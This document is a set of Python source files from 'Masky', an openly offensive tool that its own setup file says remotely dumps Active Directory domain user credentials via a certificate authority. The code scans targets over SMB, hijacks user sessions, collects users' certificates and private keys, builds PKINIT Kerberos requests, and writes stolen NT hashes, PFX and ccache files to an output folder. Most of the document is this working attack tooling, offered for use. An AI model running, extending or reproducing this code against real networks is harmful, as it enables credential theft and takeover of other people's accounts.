class AlgorithmIdentifiers(asn1core.SequenceOf):
    _child_spec = asn1x509.AlgorithmIdentifier


class Asn1KerberosTime(asn1core.GeneralizedTime):
    """KerberosTime ::= GeneralizedTime"""


class ExternalPrincipalIdentifier(asn1core.Sequence):
    _fields = [
        (
            "subjectName",
            asn1core.OctetString,
            {"tag_type": "implicit", "tag": 0, "optional": True},
        ),
        (
            "issuerAndSerialNumber",
            asn1core.OctetString,
            {"tag_type": "implicit", "tag": 1, "optional": True},
        ),
        (
            "subjectKeyIdentifier",
            asn1core.OctetString,
            {"tag_type": "implicit", "tag": 2, "optional": True},
        ),
    ]


class KDCDHKeyInfo(asn1core.Sequence):
    _fields = [
        (
            "subjectPublicKey",
            asn1core.BitString,
            {"tag_type": "explicit", "tag": 0},
        ),
        ("nonce", asn1core.Integer, {"tag_type": "explicit", "tag": 1}),
        (
            "dhKeyExpiration",
            Asn1KerberosTime,
            {"tag_type": "explicit", "tag": 2, "optional": True},
        ),
    ]


class ExternalPrincipalIdentifiers(asn1core.SequenceOf):
    _child_spec = ExternalPrincipalIdentifier


class DHRepInfo(asn1core.Sequence):
    _fields = [
        (
            "dhSignedData",
            asn1core.OctetString,
            {"tag_type": "implicit", "tag": 0},
        ),
        (
            "serverDHNonce",
            DHNonce,
            {"tag_type": "explicit", "tag": 1, "optional": True},
        ),
    ]


class PA_PK_AS_REQ(asn1core.Sequence):
    _fields = [
        (
            "signedAuthPack",
            asn1core.OctetString,
            {"tag_type": "implicit", "tag": 0},
        ),
        (
            "trustedCertifiers",
            ExternalPrincipalIdentifiers,
            {"tag_type": "explicit", "tag": 1, "optional": True},
        ),
        (
            "kdcPkId",
            asn1core.OctetString,
            {"tag_type": "implicit", "tag": 2, "optional": True},
        ),
    ]


class PA_PK_AS_REP(asn1core.Choice):
    _alternatives = [
        ("dhInfo", DHRepInfo, {"explicit": (2, 0)}),
        ("encKeyPack", asn1core.OctetString, {"implicit": (2, 1)}),
    ]


class DirtyDH:
    def __init__(self):
        self.p = None
        self.g = None
        self.shared_key = None
        self.shared_key_int = None
        self.private_key = os.urandom(32)
        self.private_key_int = int(self.private_key.hex(), 16)
        self.dh_nonce = os.urandom(32)

    @staticmethod
    def from_params(p, g):
        dd = DirtyDH()
        dd.p = p
        dd.g = g
        return dd

    @staticmethod
    def from_dict(dhp):
        dd = DirtyDH()
        dd.p = dhp["p"]
        dd.g = dhp["g"]
        return dd

    @staticmethod
    def from_asn1(asn1_bytes):
        dhp = asn1algos.DHParameters.load(asn1_bytes).native
        return DirtyDH.from_dict(dhp)

    def get_public_key(self):
        # y = g^x mod p
        return pow(self.g, self.private_key_int, self.p)

    def exchange(self, bob_int):
        self.shared_key_int = pow(bob_int, self.private_key_int, self.p)
        x = hex(self.shared_key_int)[2:]
        if len(x) % 2 != 0:
            x = "0" + x
        self.shared_key = bytes.fromhex(x)
        return self.shared_key


class PKAuthenticator(asn1core.Sequence):
    _fields = [
        ("cusec", asn1core.Integer, {"tag_type": "explicit", "tag": 0}),
        ("ctime", Asn1KerberosTime, {"tag_type": "explicit", "tag": 1}),
        ("nonce", asn1core.Integer, {"tag_type": "explicit", "tag": 2}),
        (
            "paChecksum",
            asn1core.OctetString,
            {"tag_type": "explicit", "tag": 3, "optional": True},
        ),
    ]


class AuthPack(asn1core.Sequence):
    _fields = [
        (
            "pkAuthenticator",
            PKAuthenticator,
            {"tag_type": "explicit", "tag": 0},
        ),
        (
            "clientPublicValue",
            asn1keys.PublicKeyInfo,
            {"tag_type": "explicit", "tag": 1, "optional": True},
        ),
        (
            "supportedCMSTypes",
            AlgorithmIdentifiers,
            {"tag_type": "explicit", "tag": 2, "optional": True},
        ),
        (
            "clientDHNonce",
            DHNonce,
            {"tag_type": "explicit", "tag": 3, "optional": True},
        ),
    ]


def sign_authpack(
    data: bytes,
    key: rsa.RSAPrivateKey,
    cert: Union[x509.Certificate, asn1x509.Certificate],
) -> bytes:
    if isinstance(cert, x509.Certificate):
        cert = asn1x509.Certificate.load(cert_to_der(cert))

    digest_algorithm = {}
    digest_algorithm["algorithm"] = asn1algos.DigestAlgorithmId("sha1")

    signer_info = {}
    signer_info["version"] = "v1"
    signer_info["sid"] = asn1cms.IssuerAndSerialNumber(
        {
            "issuer": cert.issuer,
            "serial_number": cert.serial_number,
        }
    )

    signer_info["digest_algorithm"] = asn1algos.DigestAlgorithm(
        digest_algorithm
    )
    signer_info["signed_attrs"] = [
        asn1cms.CMSAttribute(
            {"type": "content_type", "values": ["1.3.6.1.5.2.3.1"]}
        ),
        asn1cms.CMSAttribute(
            {
                "type": "message_digest",
                "values": [hash_digest(data, hashes.SHA1)],
            }
        ),
    ]
    signer_info["signature_algorithm"] = asn1algos.SignedDigestAlgorithm(
        {"algorithm": "sha1_rsa"}
    )
    signer_info["signature"] = rsa_pkcs1v15_sign(
        asn1cms.CMSAttributes(signer_info["signed_attrs"]).dump(),
        key,
        hash=hashes.SHA1,
    )

    enscapsulated_content_info = {}
    enscapsulated_content_info["content_type"] = "1.3.6.1.5.2.3.1"
    enscapsulated_content_info["content"] = data

    signed_data = {}
    signed_data["version"] = "v3"
    signed_data["digest_algorithms"] = [
        asn1algos.DigestAlgorithm(digest_algorithm)
    ]
    signed_data["encap_content_info"] = asn1cms.EncapsulatedContentInfo(
        enscapsulated_content_info
    )
    signed_data["certificates"] = [cert]
    signed_data["signer_infos"] = asn1cms.SignerInfos(
        [asn1cms.SignerInfo(signer_info)]
    )

    content_info = {}
    content_info["content_type"] = "1.2.840.113549.1.7.2"
    content_info["content"] = asn1cms.SignedData(signed_data)

    return asn1cms.ContentInfo(content_info).dump()


def build_pkinit_as_req(
    username: str, domain: str, key: rsa.RSAPrivateKey, cert: x509.Certificate
) -> Tuple[AS_REQ, DirtyDH]:
    as_req = AS_REQ()

    server_name = Principal(
        "krbtgt/%s" % domain,
        type=constants.PrincipalNameType.NT_PRINCIPAL.value,
    )
    client_name = Principal(
        username, type=constants.PrincipalNameType.NT_PRINCIPAL.value
    )

    pac_request = KERB_PA_PAC_REQUEST()
    pac_request["include-pac"] = True
    encoded_pac_request = encoder.encode(pac_request)

    as_req["pvno"] = 5
    as_req["msg-type"] = int(constants.ApplicationTagNumbers.AS_REQ.value)

    req_body = seq_set(as_req, "req-body")

    opts = []
    opts.append(constants.KDCOptions.forwardable.value)
    opts.append(constants.KDCOptions.renewable.value)
    opts.append(constants.KDCOptions.proxiable.value)
    req_body["kdc-options"] = constants.encodeFlags(opts)

    seq_set(req_body, "sname", server_name.components_to_asn1)
    seq_set(req_body, "cname", client_name.components_to_asn1)

    req_body["realm"] = domain

    now = datetime.datetime.now(datetime.timezone.utc)
    req_body["till"] = KerberosTime.to_asn1(now + datetime.timedelta(days=1))
    req_body["rtime"] = KerberosTime.to_asn1(now + datetime.timedelta(days=1))
    req_body["nonce"] = getrandbits(31)

    supported_ciphers = (
        int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
        int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),
    )

    seq_set_iter(req_body, "etype", supported_ciphers)

    encoded_req_body = encoder.encode(req_body)

    checksum = hash_digest(encoded_req_body, hashes.SHA1)

    diffie = DirtyDH.from_dict(DH_PARAMS)

    authpack = AuthPack(
        {
            "pkAuthenticator": PKAuthenticator(
                {
                    "cusec": now.microsecond,
                    "ctime": now.replace(microsecond=0),
                    "nonce": getrandbits(31),
                    "paChecksum": checksum,
                }
            ),
            "clientPublicValue": asn1keys.PublicKeyInfo(
                {
                    "algorithm": asn1keys.PublicKeyAlgorithm(
                        {
                            "algorithm": "1.2.840.10046.2.1",
                            "parameters": asn1keys.DomainParameters(
                                {"p": diffie.p, "g": diffie.g, "q": 0}
                            ),
                        }
                    ),
                    "public_key": diffie.get_public_key(),
                }
            ),
            "clientDHNonce": diffie.dh_nonce,
        }
    )

    signed_authpack = sign_authpack(authpack.dump(), key, cert)

    pa_pk_as_req = PA_PK_AS_REQ()
    pa_pk_as_req["signedAuthPack"] = signed_authpack
    encoded_pa_pk_as_req = pa_pk_as_req.dump()

    as_req["padata"] = noValue

    as_req["padata"][0] = noValue
    as_req["padata"][0]["padata-type"] = int(
        constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value
    )
    as_req["padata"][0]["padata-value"] = encoded_pac_request

    as_req["padata"][1] = noValue
    as_req["padata"][1]["padata-type"] = int(
        constants.PreAuthenticationDataTypes.PA_PK_AS_REQ.value
    )
    as_req["padata"][1]["padata-value"] = encoded_pa_pk_as_req

    return as_req, diffie



import logging
import traceback
import sys
from ..utils.logger import load_custom_logger
from .console import Console

VERSION = "0.0.3"
logger = logging.getLogger("masky")


def print_banner():
    print(
        f"""
  __  __           _          
 |  \/  | __ _ ___| | ___   _ 
 | |\/| |/ _` / __| |/ / | | |
 | |  | | (_| \__ \   <| |_| |
 |_|  |_|\__,_|___/_|\_\\__,  |
  v{VERSION}                 |___/ 
    """
    )


def ctrlc_handler(exception, cli):
    logger.warn("Interruption received, wait for Masky to finish running scans... ")
    try:
        if cli:
            cli.stop()
    except:
        pass
    logger.info("Exiting...")
    sys.exit(0)


def main():
    try:
        cli = None
        print_banner()
        load_custom_logger()
        cli = Console()
        cli.start()
    except KeyboardInterrupt as e:
        ctrlc_handler(e, cli)
    except Exception as e:
        logger.error(
            f'Masky encountered an unexpected error: "{str(e)}"\n'
            "-------------------------- Traceback --------------------------\n"
            f"{traceback.format_exc()}\n"
            "---------------------------------------------------------------\n"
            f"Please provide this output to the Masky development team\n"
        )
    logger.info("Exiting...")


if __name__ == "__main__":
    main()



import logging
import threading
import sys
from colorama import Fore, Style


class CustomLogger(logging.Formatter):
    """This Formatter class is used to format log in STDOUT (with colors and icon)"""

    def __init__(self, ts):
        self.__ts = ts

        self._figures = {
            "debug": "o",
            "info": "*",
            "result": "+",
            "warning": "~",
            "error": "×",
        }
        self.dbg_fmt = f"{Fore.MAGENTA}[{self._figures['debug']}]{Style.RESET_ALL} %(threadName)s%(msg)s"
        self.info_fmt = f"{Fore.BLUE}[{self._figures['info']}]{Style.RESET_ALL} %(threadName)s%(msg)s"
        self.result_fmt = f"{Fore.GREEN}[{self._figures['result']}]{Style.RESET_ALL} %(threadName)s%(msg)s"
        self.warn_fmt = f"{Fore.YELLOW}[{self._figures['warning']}]{Style.RESET_ALL} %(threadName)s%(msg)s"
        self.err_fmt = f"{Fore.RED}[{self._figures['error']}] %(threadName)s%(msg)s{Style.RESET_ALL}"

        if ts:
            self.dbg_fmt = f"{Fore.LIGHTBLACK_EX}%(asctime)s {self.dbg_fmt}"
            self.info_fmt = f"{Fore.LIGHTBLACK_EX}%(asctime)s {self.info_fmt}"
            self.result_fmt = f"{Fore.LIGHTBLACK_EX}%(asctime)s {self.result_fmt}"
            self.warn_fmt = f"{Fore.LIGHTBLACK_EX}%(asctime)s {self.warn_fmt}"
            self.err_fmt = f"{Fore.LIGHTBLACK_EX}%(asctime)s {self.err_fmt}"

        super().__init__(fmt="%(levelno)d: %(msg)s", datefmt=None, style="%")

    def format(self, record):
        format_orig = self._style._fmt

        if record.levelno == logging.DEBUG:
            self._style._fmt = self.dbg_fmt

        elif record.levelno == logging.INFO:
            self._style._fmt = self.info_fmt

        elif record.levelno == logging.WARN:
            self._style._fmt = self.warn_fmt

        elif record.levelno == logging.ERROR:
            self._style._fmt = self.err_fmt

        else:
            self._style._fmt = self.result_fmt

        result = logging.Formatter.format(self, record)
        self._style._fmt = format_orig

        return result


def add_result_level():
    logger = logging.getLogger("masky")
    logging.addLevelName(0, "RESULT")
    setattr(
        logger,
        "result",
        lambda message, *args: logging.getLogger("masky")._log(25, message, args),
    )


def load_custom_logger(ts=False):
    threading.current_thread().name = ""
    cust_logger = CustomLogger(ts)
    s_hdlr = logging.StreamHandler(sys.stdout)
    s_hdlr.setFormatter(cust_logger)
    logger = logging.getLogger("masky")
    logger.handlers = []
    logger.addHandler(s_hdlr)
    logger.setLevel(logging.INFO)
    add_result_level()



import socket
import logging
from .utils.toolbox import scan_port
from .lib.smb import Smb
from .lib.cert.auth import Authenticate
from .utils.logger import add_result_level

logger = logging.getLogger("masky")


class Masky:
    def __init__(
        self,
        ca,
        user,
        domain=".",
        password=None,
        hashes=None,
        kerberos=False,
        dc_ip=None,
    ):
        self.__ca = ca
        self.__domain = domain
        self.__user = user
        self.__password = password
        self.__hashes = hashes
        self.__kerberos = kerberos
        self.__dc_ip = dc_ip
        self.__dc_target = None

    def __process_options(self):
        try:
            self.__dc_target = socket.gethostbyname(self.__domain)
        except:
            self.__dc_target = self.__dc_ip
        if self.__dc_target == "0.0.0.0":
            self.__dc_target = self.__dc_ip
        if not self.__dc_target:
            logger.error(
                "The provided domain cannot be resolved, please provide the DC IP address"
            )
            return False
        return True

    def __process_certificate(self, user_data):
        certipy_auth = Authenticate(self.__dc_ip, user_data, False, False)
        if certipy_auth.authenticate():
            return True
        return False

    def run(self, target):
        add_result_level()
        if not self.__process_options():
            return None

        if not scan_port(target):
            logger.info("The port tcp/445 seems not exposed, skipping this target")
            return None

        s = Smb(
            self.__domain,
            self.__user,
            password=self.__password,
            hashes=self.__hashes,
            kerberos=self.__kerberos,
            dc_target=self.__dc_target,
        )
        rslt = None
        try:
            rslt = s.exec_masky(target, self.__ca)
        except:
            return rslt
        if not rslt or not rslt.users:
            logger.info("No user session was hijacked")
            return None
        if len(rslt.users) == 1:
            logger.info(f"{len(rslt.users)} user session was hijacked")
        else:
            logger.info(f"{len(rslt.users)} user sessions were hijacked")
        for user_data in rslt.users:
            logger.debug(
                f"Start processing PFX of the user '{user_data.domain}\{user_data.name}'"
            )
            if not self.__process_certificate(user_data):
                logger.warn(
                    f"Fail to process gathered certificate related to the user '{user_data.domain}\{user_data.name}'"
                )
            else:
                logger.debug(
                    f"End processing PFX of the user '{user_data.domain}\{user_data.name}'"
                )
        return rslt



import argparse
import logging
import sys
from getpass import getpass
from ..utils.targets import Targets
from ..utils.logger import load_custom_logger

logger = logging.getLogger("masky")


class Options:
    def __init__(self, cli_parser):
        self.ca = cli_parser.certificate_authority
        self.dc_ip = cli_parser.dc_ip
        self.domain = cli_parser.domain
        self.user = cli_parser.user
        self.password = cli_parser.password
        self.hashes = cli_parser.hashes
        self.kerberos = cli_parser.kerberos
        self.no_hash = cli_parser.no_hash
        self.no_pfx = cli_parser.no_pfx
        self.no_ccache = cli_parser.no_ccache
        self.targets = cli_parser.targets
        self.threads = cli_parser.threads
        self.verbose = cli_parser.verbose
        self.timestamps = cli_parser.timestamps
        self.output = cli_parser.output

    def process(self):
        logger.info("Loading options...")
        if not self.check_secret() or not self.check_targets() or not self.check_misc():
            return False
        return True

    def check_targets(self):
        targets = Targets(self.targets)
        self.targets = targets.load()
        if not self.targets:
            logger.error("No valid targets submitted")
            return False
        logger.info(f"{len(self.targets)} target(s) loaded")
        return True

    def check_secret(self):
        if self.password:
            return True
        elif self.hashes and ":" in self.hashes:
            return True
        elif self.kerberos:
            self.user = ""
            self.domain = ""
            self.password = ""
            self.hashes = None
            return True
        elif not self.password and not self.hashes and not self.kerberos:
            self.password = getpass()
            return True

        logger.error("Invalid credentials submitted")
        return False

    def check_misc(self):
        if self.threads not in range(1, 15):
            logger.warn(
                "The threadpool size cannot exceed 15, enforcing to the maximum value"
            )
            self.threads = 15
        if self.timestamps:
            load_custom_logger(ts=True)
        if self.verbose:
            logger.setLevel(logging.DEBUG)
        return True


def get_cli_args():
    parser = argparse.ArgumentParser(prog="Masky")

    # Masky attributes
    parser.add_argument(
        "-v",
        "--verbose",
        action="store_true",
        default=False,
        help="Enable debugging messages",
    )
    parser.add_argument(
        "-ts",
        "--timestamps",
        action="store_true",
        default=False,
        help="Display timestamps for each log",
    )
    parser.add_argument(
        "-t",
        "--threads",
        type=int,
        action="store",
        default=1,
        help="Threadpool size (max 15)",
    )
    parser.add_argument(
        "targets",
        nargs="*",
        type=str,
        action="store",
        help="Targets in CIDR, hostname and IP formats are accepted, from a file or not",
    )

    # Authentication attributes
    group_auth = parser.add_argument_group("Authentication")
    group_auth.add_argument(
        "-d",
        "--domain",
        action="store",
        default=".",
        help="Domain name to authenticate to",
    )
    group_auth.add_argument(
        "-u",
        "--user",
        action="store",
        help="Username to authenticate with",
    )
    group_auth.add_argument(
        "-p",
        "--password",
        default=None,
        action="store",
        help="Password to authenticate with",
    )
    group_auth.add_argument(
        "-k",
        "--kerberos",
        action="store_true",
        default=False,
        help="Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on "
        "target parameters.",
    ),
    group_auth.add_argument(
        "-H",
        "--hashes",
        action="store",
        default=None,
        help="Hashes to authenticate with (LM:NT, :NT or :LM)",
    )

    # Connection attributes
    group_connect = parser.add_argument_group("Connection")
    group_connect.add_argument(
        "-dc-ip",
        action="store",
        metavar="ip address",
        default=None,
        help="IP Address of the domain controller. If omitted it will use "
        "the domain part (FQDN) specified in the target parameter",
    )
    group_connect.add_argument(
        "-ca",
        "--certificate-authority",
        action="store",
        help="Certificate Authority Name (SERVER\CA_NAME)",
        required=True,
    )

    # Results attributes
    group_results = parser.add_argument_group("Results")
    group_results.add_argument(
        "-nh",
        "--no-hash",
        action="store_true",
        default=False,
        help="Do not request NT hashes",
    )
    group_results.add_argument(
        "-nt",
        "--no-ccache",
        action="store_true",
        default=False,
        help="Do not save ccache files",
    )
    group_results.add_argument(
        "-np",
        "--no-pfx",
        action="store_true",
        default=False,
        help="Do not save pfx files",
    )
    group_results.add_argument(
        "-o",
        "--output",
        default="masky-output",
        help="Local path to a folder where Masky results will be stored"
        " (automatically creates the folder if it does not exit)",
    )

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    return parser.parse_args()



import re
import logging
import socket
import ipaddress
from enum import IntEnum
from .toolbox import is_valid_file

logger = logging.getLogger("masky")


class TargetType(IntEnum):
    IP = 1
    HOST = 2
    CIDR = 3


class CIDR:
    def __init__(self, cidr):
        self.target = cidr

    def get(self):
        try:
            for ip in list(ipaddress.ip_network(self.target, False).hosts()):
                yield str(ip)
        except ValueError as e:
            logger.warning(f"Cannot parse the CIDR '{self.target}': {e}")
            return []


class Host:
    def __init__(self, host):
        self.target = host

    def get(self):
        """Get the IP linked to the hostname stored within this object"""
        try:
            socket.gethostbyname_ex(self.target)[-1]
            yield self.target.lower()
        except Exception as e:
            logger.warn(f"Can't resolve '{self.target}': {e}")
            return []


class IP:
    def __init__(self, ip):
        self._target = ip

    def get(self):
        try:
            yield self._target
        except socket.error:
            logger.warn(f"Cannot validate IP: '{self._target}'")
            return []


SCOPE_CLASS = {TargetType.CIDR: CIDR, TargetType.HOST: Host, TargetType.IP: IP}


class Targets:
    def __init__(self, targets):
        self.__raw_targets = targets
        self.scope = []

    def load(self):
        for target in self.__raw_targets:
            if is_valid_file(target):
                tmp_targets = []
                with open(target) as fd:
                    tmp_targets = fd.read().splitlines()
                for target in tmp_targets:
                    self.__add_to_scope(target)
            else:
                self.__add_to_scope(target)
        return self.scope

    def __add_to_scope(self, target):
        target_type = self.__check_target_type(target)
        items = SCOPE_CLASS[target_type](target)
        for target in items.get():
            if target not in self.scope:
                self.scope.append(target)

    def __check_target_type(self, target):
        if re.match(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/\d{1,2}", target):
            return TargetType.CIDR
        elif re.match(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}", target):
            return TargetType.IP
        return TargetType.HOST



import json
import logging
from .cert.misc import process_pfx

logger = logging.getLogger("masky")


class MaskyResults:
    def __init__(self):
        self.json_data = None
        self.errors = None
        self.hostname = None
        self.users = []

    def save_content_to_json(self, data):
        try:
            if data == b"\r\n":
                self.json_data = ""
            else:
                self.json_data = json.loads(data)
        except:
            self.json_data = None

    def parse_agent_errors(self, data):
        self.errors = str(data, "UTF-8")
        if "The RPC server is unavailable".lower() in self.errors.lower():
            self.errors = ""
        elif data != b"\r\n":
            logger.debug(
                f"The Masky agent execution failed due to the following errors:\n{self.errors}"
            )

    def process_data(self):
        self.hostname = self.json_data[0].get("Hostname", None)
        for user_data in self.json_data:
            username = user_data.get("Username", None)
            cert = user_data.get("Cert", None)
            private_key = user_data.get("PrivateKey", None)
            if username and cert and private_key:
                user = User(username, cert, private_key)
                self.users.append(user)


class User:
    def __init__(self, username, cert, privatekey):
        self.domain, self.name = username.lower().split("\\")
        self.cert_from_pem = bytes(cert, "utf-8")
        self.pk_from_pem = bytes(privatekey, "utf-8")
        self.pfx, self.privatekey, self.cert = process_pfx(
            self.cert_from_pem, self.pk_from_pem
        )
        self.upn = f"{self.name}@{self.domain}".lower()
        self.nt_hash = ""
        self.ccache = ""



import pathlib

from setuptools import setup, find_packages

HERE = pathlib.Path(__file__).parent
README = (HERE / "README.md").read_text()


setup(
    name="masky",
    version="0.0.3",
    description="Python library with CLI allowing to remotely dump domain user credentials via an ADCS",
    long_description=README,
    long_description_content_type="text/markdown",
    license="MIT",
    author="Zak",
    python_requires=">=3.6",
    packages=find_packages(exclude=["assets"]),
    install_requires=[
        "colorama",
        "impacket",
        "cryptography>=3.5",
        "pyasn1",
        "asn1crypto",
    ],
    entry_points={
        "console_scripts": [
            "masky = masky.ui.main:main",
        ],
    },
    include_package_data=True,
    zip_safe=False,
)



import logging
from pathlib import Path
from queue import Empty
from ..utils.threadpool import ThreadPool
from ..core import Masky
from ..utils.toolbox import is_valid_output_folder
from .options import Options, get_cli_args

GET_QUEUE_TIMEOUT = 0.01
logger = logging.getLogger("masky")


class Console:
    def __init__(self):
        self.__tp = None
        self.__opts = None

    def __save_pfx(self, output_folder, user):
        try:
            pfx_path = Path(output_folder / f"{user.domain}-{user.name}.pfx")
            with open(pfx_path, "wb+") as fd:
                fd.write(user.pfx)
        except:
            pass

    def __save_ccache(self, output_folder, user):
        try:
            ccache_path = Path(output_folder / f"{user.domain}-{user.name}.ccache")
            with open(ccache_path, "wb+") as fd:
                fd.write(user.ccache)
        except:
            pass

    def __save_hashes(self, hashes_file, user):
        try:
            nt_entry = f"{user.domain}\\{user.name}:{user.nt_hash}"
            if not hashes_file.is_file():
                hashes_file.touch()
            with open(hashes_file, "r+") as fd:
                if not nt_entry in fd.read():
                    fd.write(f"{nt_entry}\n")
        except Exception as e:
            pass

    def __process_results(self, rslt):
        if not rslt or not rslt.users:
            return False
        output_folder = Path(self.__opts.output)
        hashes_file = output_folder / "hashes.txt"
        if not is_valid_output_folder(self.__opts.output):
            output_folder.mkdir(parents=True, exist_ok=True)
        for user in rslt.users:
            if not self.__opts.no_hash and user.nt_hash:
                self.__save_hashes(hashes_file, user)
            if not self.__opts.no_pfx and user.pfx:
                self.__save_pfx(output_folder, user)
            if not self.__opts.no_ccache and user.ccache:
                self.__save_ccache(output_folder, user)
        return True

    def __run(self):
        masky = Masky(
            ca=self.__opts.ca,
            dc_ip=self.__opts.dc_ip,
            domain=self.__opts.domain,
            user=self.__opts.user,
            password=self.__opts.password,
            hashes=self.__opts.hashes,
            kerberos=self.__opts.kerberos,
        )
        self.__tp = ThreadPool(masky, self.__opts.targets, self.__opts.threads)
        self.__tp.start()
        processed_targets = 0
        while processed_targets != len(self.__opts.targets):
            try:
                rslt = self.__tp.output_queue.get(timeout=GET_QUEUE_TIMEOUT)
                self.__process_results(rslt)
                processed_targets += 1
            except Empty:
                pass

    def start(self):
        cli_parser = get_cli_args()
        self.__opts = Options(cli_parser)
        if not self.__opts.process():
            logger.error("The provided options are invalids")
            return False
        self.__run()
        return True

    def stop(self):
        try:
            active_threads = self.__tp.get_active_threads()
            self.__tp.stop()
            while not self.__tp.output_queue.empty():
                rslt = self.__tp.output_queue.get()
                try:
                    self.__process_results(rslt)
                except Exception as e:
                    logger.warn(f"Fail to process results ({str(e)})")
        except KeyboardInterrupt:
            logger.warn(
                "Multiple interruption signals were triggered, Masky is forced to exit without properly cleaning currently processed servers"
            )
            logger.warn(
                f"The following servers may be cleaned manually: {active_threads}"
            )



from cryptography import x509
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.serialization import (
    NoEncryption,
    pkcs12,
)


def process_pfx(cert, private_key):
    rsa_pk = serialization.load_pem_private_key(private_key, None)
    x509_cert = x509.load_pem_x509_certificate(cert)
    pfx = pkcs12.serialize_key_and_certificates(
        name=b"",
        key=rsa_pk,
        cert=x509_cert,
        cas=None,
        encryption_algorithm=NoEncryption(),
    )
    return pfx, rsa_pk, x509_cert



import logging
import threading
import traceback
from queue import Empty, Queue

logger = logging.getLogger("masky")


class ThreadPool:
    def __init__(self, masky, targets, nb_threads):
        self.__masky = masky
        self.targets_queue = Queue()
        self.output_queue = Queue()
        for target in targets:
            self.targets_queue.put(target)
        self.__nb_threads = nb_threads
        self.__thread_pool = []
        self.__name_thread = ""
        self.__active = True

    def start(self):
        logger.debug(f"Initialization of the threadpool (size: {self.__nb_threads})")
        for _ in range(self.__nb_threads):
            thread = threading.Thread(target=self.__worker, daemon=True, name="")
            thread.start()
            self.__thread_pool.append(thread)

    def get_active_threads(self):
        active_threads = []
        for thread in self.__thread_pool:
            if not "thread" in thread.name.lower():
                target = thread.name.lower().strip(" ").strip("(").strip(")")
                active_threads.append(target)
        return active_threads

    def stop(self):
        self.__active = False

        for thread in self.__thread_pool:
            if not "thread" in thread.name.lower():
                thread.join()

    def __worker(self):
        while self.__active:
            target = None

            try:
                target = self.targets_queue.get()
            except Empty:
                break

            try:
                if target:
                    self.__name_thread = f"({target}) "
                    threading.current_thread().name = self.__name_thread
                    logger.debug(f"Start of target processing")
                    rslt = self.__masky.run(target)
                    self.output_queue.put(rslt)
                    logger.debug(f"End of target processing")
            except Exception as e:
                logger.error(
                    f'Masky thread processing target "{self.__name_thread}" encountered an unexpected error: "{str(e)}"\n'
                    "-------------------------- Traceback --------------------------\n"
                    f"{traceback.format_exc()}\n"
                    "---------------------------------------------------------------\n"
                    f"Please provide this output to the Masky development team\n"
                )
                self.output_queue.put(None)
